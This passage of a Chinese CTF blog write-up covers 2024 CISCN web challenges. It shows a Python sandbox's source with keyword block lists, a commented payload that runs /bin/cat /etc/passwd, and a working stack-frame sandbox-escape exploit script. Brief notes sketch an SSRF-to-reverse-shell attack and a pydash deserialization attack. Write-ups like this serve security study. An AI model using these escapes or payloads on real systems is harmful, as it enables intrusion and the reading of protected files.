class="line">        <span class="built_in">print</span>(<span class="string">&quot;non-ascii is not permitted&quot;</span>)</span><br><span class="line">        exit()</span><br><span class="line"></span><br><span class="line">    <span class="comment"># 不能有__ getattr exit</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> [<span class="string">&quot;__&quot;</span>, <span class="string">&quot;getattr&quot;</span>, <span class="string">&quot;exit&quot;</span>]:</span><br><span class="line">        <span class="keyword">if</span> i <span class="keyword">in</span> source.lower():</span><br><span class="line">            <span class="built_in">print</span>(i)</span><br><span class="line">            exit()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">block_wrapper</span>():</span><br><span class="line">    <span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">    Check the run process with sys.audithook, no dangerous operations should be conduct</span></span><br><span class="line"><span class="string">    :return: None</span></span><br><span class="line"><span class="string">    &quot;&quot;&quot;</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">audit</span>(<span class="params">event, args</span>):</span><br><span class="line"></span><br><span class="line">        <span class="keyword">from</span> builtins <span class="keyword">import</span> <span class="built_in">str</span>, <span class="built_in">print</span></span><br><span class="line">        <span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line">        <span class="built_in">print</span>(<span class="string">f&quot;event:<span class="subst">&#123;event&#125;</span>&quot;</span>)</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">f&quot;args:<span class="subst">&#123;args&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> [<span class="string">&quot;marshal&quot;</span>, <span class="string">&quot;__new__&quot;</span>, <span class="string">&quot;process&quot;</span>, <span class="string">&quot;os&quot;</span>, <span class="string">&quot;sys&quot;</span>, <span class="string">&quot;interpreter&quot;</span>, <span class="string">&quot;cpython&quot;</span>, <span class="string">&quot;open&quot;</span>, <span class="string">&quot;compile&quot;</span>, <span class="string">&quot;gc&quot;</span>]:</span><br><span class="line">            <span class="keyword">if</span> i <span class="keyword">in</span> (event + <span class="string">&quot;&quot;</span>.join(<span class="built_in">str</span>(s) <span class="keyword">for</span> s <span class="keyword">in</span> args)).lower():</span><br><span class="line">                <span class="built_in">print</span>(i)</span><br><span class="line">                os._exit(<span class="number">1</span>)</span><br><span class="line">    <span class="keyword">return</span> audit</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">source_opcode_checker</span>(<span class="params">code</span>):</span><br><span class="line">    <span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">    Check the source in the bytecode aspect, no methods and globals should be load</span></span><br><span class="line"><span class="string">    :param code: source code</span></span><br><span class="line"><span class="string">    :return: None</span></span><br><span class="line"><span class="string">    &quot;&quot;&quot;</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">from</span> dis <span class="keyword">import</span> dis</span><br><span class="line">    <span class="keyword">from</span> builtins <span class="keyword">import</span> <span class="built_in">str</span></span><br><span class="line">    <span class="keyword">from</span> io <span class="keyword">import</span> StringIO</span><br><span class="line">    <span class="keyword">from</span> sys <span class="keyword">import</span> exit</span><br><span class="line"></span><br><span class="line">    opcodeIO = StringIO()       <span class="comment"># 创建内存对象</span></span><br><span class="line">    dis(code, file=opcodeIO)    <span class="comment"># code反汇编写入到opcodeIO对象中</span></span><br><span class="line">    opcode = opcodeIO.getvalue().split(<span class="string">&quot;\n&quot;</span>)    <span class="comment">#</span></span><br><span class="line">    opcodeIO.close()</span><br><span class="line">    <span class="keyword">for</span> line <span class="keyword">in</span> opcode:</span><br><span class="line">        <span class="keyword">if</span> <span class="built_in">any</span>(x <span class="keyword">in</span> <span class="built_in">str</span>(line) <span class="keyword">for</span> x <span class="keyword">in</span> [<span class="string">&quot;LOAD_GLOBAL&quot;</span>, <span class="string">&quot;IMPORT_NAME&quot;</span>, <span class="string">&quot;LOAD_METHOD&quot;</span>]):</span><br><span class="line">            <span class="keyword">if</span> <span class="built_in">any</span>(x <span class="keyword">in</span> <span class="built_in">str</span>(line) <span class="keyword">for</span> x <span class="keyword">in</span> [<span class="string">&quot;randint&quot;</span>, <span class="string">&quot;randrange&quot;</span>, <span class="string">&quot;print&quot;</span>, <span class="string">&quot;seed&quot;</span>]):</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;&quot;</span>.join([x <span class="keyword">for</span> x <span class="keyword">in</span> [<span class="string">&quot;LOAD_GLOBAL&quot;</span>, <span class="string">&quot;IMPORT_NAME&quot;</span>, <span class="string">&quot;LOAD_METHOD&quot;</span>] <span class="keyword">if</span> x <span class="keyword">in</span> <span class="built_in">str</span>(line)]))</span><br><span class="line">            exit()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line"></span><br><span class="line">    <span class="keyword">from</span> builtins <span class="keyword">import</span> <span class="built_in">open</span></span><br><span class="line">    <span class="keyword">from</span> sys <span class="keyword">import</span> addaudithook</span><br><span class="line">    <span class="keyword">from</span> contextlib <span class="keyword">import</span> redirect_stdout</span><br><span class="line">    <span class="keyword">from</span> random <span class="keyword">import</span> randint, randrange, seed</span><br><span class="line">    <span class="keyword">from</span> io <span class="keyword">import</span> StringIO</span><br><span class="line">    <span class="keyword">from</span> random <span class="keyword">import</span> seed</span><br><span class="line">    <span class="keyword">from</span> time <span class="keyword">import</span> time</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="comment"># source = open(f&quot;/app/uploads/THIS_IS_TASK_RANDOM_ID.txt&quot;, &quot;r&quot;).read()           # 读取代码文件</span></span><br><span class="line">    <span class="comment"># source = &#x27;_posixsubprocess.fork_exec([b&quot;/bin/cat&quot;,&quot;/etc/passwd&quot;], [b&quot;/bin/cat&quot;], True, (), None, None, -1, -1, -1, -1, -1, -1, *(os.pipe()), False, False,False, None, None, None, -1, None, False)&#x27;</span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># source = &quot;@exec\n@input\nclass X:\n\tpass&quot;</span></span><br><span class="line"></span><br><span class="line">    source_simple_check(source)	</span><br><span class="line">    source_opcode_checker(source)</span><br><span class="line">    code = <span class="built_in">compile</span>(source, <span class="string">&quot;&lt;sandbox&gt;&quot;</span>, <span class="string">&quot;exec&quot;</span>)</span><br><span class="line">    addaudithook(block_wrapper())</span><br><span class="line">    outputIO = StringIO()</span><br><span class="line">    <span class="keyword">with</span> redirect_stdout(outputIO):         <span class="comment"># 将执行结果重定向到outputIO对象中</span></span><br><span class="line">        seed(<span class="built_in">str</span>(time()) + <span class="string">&quot;THIS_IS_SEED&quot;</span> + <span class="built_in">str</span>(time()))</span><br><span class="line">        <span class="built_in">exec</span>(code, &#123;</span><br><span class="line">            <span class="string">&quot;__builtins__&quot;</span>: <span class="literal">None</span>,</span><br><span class="line">            <span class="string">&quot;randint&quot;</span>: randint,</span><br><span class="line">            <span class="string">&quot;randrange&quot;</span>: randrange,</span><br><span class="line">            <span class="string">&quot;seed&quot;</span>: seed,</span><br><span class="line">            <span class="string">&quot;print&quot;</span>: <span class="built_in">print</span></span><br><span class="line">        &#125;, <span class="literal">None</span>)</span><br><span class="line">    output = outputIO.getvalue()           <span class="comment"># 获取执行结果</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> <span class="string">&quot;THIS_IS_SEED&quot;</span> <span class="keyword">in</span> output:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;这 runtime 你就嘎嘎写吧， 一写一个不吱声啊，点儿都没拦住！&quot;</span>)</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;bad code-operation why still happened ah?&quot;</span>)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="built_in">print</span>(output)</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<p>exp：</p>
<p>表示常量：<code>co_consts</code></p>
<p>表示符号：<code>co_names</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">&#x27;https://d0f3ee51-5c32-43ba-8514-040bde99f2a9.challenge.ctf.show/run&#x27;</span></span><br><span class="line">data = &#123;</span><br><span class="line">    <span class="string">&quot;code&quot;</span>: <span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">def exp():</span></span><br><span class="line"><span class="string">    def scq():</span></span><br><span class="line"><span class="string">        yield scq.gi_frame.f_back</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    scq = scq()</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    frame = [x for x in scq][0]</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    gattr = frame.f_back.f_back.f_back.f_locals[&#x27;_&#x27;+&#x27;_builtins_&#x27;+&#x27;_&#x27;]			# jail</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    s = gattr.str</span></span><br><span class="line"><span class="string">    </span></span><br><span class="line"><span class="string">    for i in s(frame.f_back.f_back.f_back.f_code.co_consts):			# 读常量</span></span><br><span class="line"><span class="string">        print(i, end = &quot;,&quot;)</span></span><br><span class="line"><span class="string">exp()</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">response = requests.post(url, json=data)</span><br><span class="line"><span class="built_in">print</span>(response.json())</span><br></pre></td></tr></table></figure>





<h2 id="ezcms"><a href="#ezcms" class="headerlink" title="ezcms"></a>ezcms</h2><p>参考xunruicms RCE的文章，发现可以进行任意函数调用，找qrcode，打一个SSRF302跳转到flag.php，反弹shell即可</p>
<h2 id="sanic"><a href="#sanic" class="headerlink" title="sanic"></a>sanic</h2><p>pydash反序列化利用</p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/2024/05/10/php-web-debug/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>Prev</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime mr-10" title="Update time"></i>
              2024-06-01 00:00:14
            </span>
            
                  <span class="post-tags">
                    <i class="iconfont icon-tags mr-10" title="Tags"></i>
                    
                    <span class="span--tag mr-8">
                      <a href="/tags/CTF/" title="CTF">
                        #CTF
                      </a>
                    </span>
                    
                  </span>
              
          </div>
          <div class="post-foot-prev">
            
              <a href="/2024/05/22/pyjail/" target="_self">
                <span>Next</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">Contents</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#2024-CISCN%E5%88%9D%E8%B5%9B-Web-%E5%A4%8D%E7%8E%B0"><span class="toc-text">2024-CISCN初赛-Web-复现</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#simple-php"><span class="toc-text">simple-php</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%BB%95%E8%BF%87%E7%9A%84%E6%89%93%E6%B3%95"><span class="toc-text">绕过的打法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9D%A1%E4%BB%B6%E7%AB%9E%E4%BA%89%E6%89%93%E4%B8%B4%E6%97%B6%E6%96%87%E4%BB%B6"><span class="toc-text">条件竞争打临时文件</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#mossfern"><span class="toc-text">mossfern</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%94%9F%E6%88%90%E5%99%A8"><span class="toc-text">生成器</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8%E6%A0%88%E5%B8%A7%E5%AE%9E%E7%8E%B0%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8"><span class="toc-text">使用栈帧实现沙箱逃逸</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%B8%80%E4%B8%AA%E5%B0%8F%E6%8F%92%E6%9B%B2"><span class="toc-text">一个小插曲</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%80%83%E9%80%B8demo"><span class="toc-text">逃逸demo</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#builtins-%E5%AD%97%E6%AE%B5"><span class="toc-text">__builtins__字段</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE"><span class="toc-text">题目</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ezcms"><span class="toc-text">ezcms</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sanic"><span class="toc-text">sanic</span></a></li></ol></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        







      </div>
    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          
              <a title="github" target="_blank" rel="noopener" href="https://github.com/Ch31sBest">
                <i class="iconfont icon-github"></i>
              </a>
              
        </li>
        
        <li>
          
              <a title="rss" href="/atom.xml">
                <i class="iconfont icon-rss"></i>
              </a>
              
        </li>
        
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Copyright © 2024 Oranges</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="Search...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>First search, index file loading, please wait...<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>No result<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The search.xml file was not found, please refer to：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The request failed, Try to refresh the page or try again later.<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + 2024-CISCN%E5%88%9D%E8%B5%9B-Web-%E5%A4%8D%E7%8E%B0 + '&url=' + http%3A%2F%2Fexample.com%2F2024%2F05%2F21%2F2024-CISCN-Review%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=http://example.com/2024/05/21/2024-CISCN-Review/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
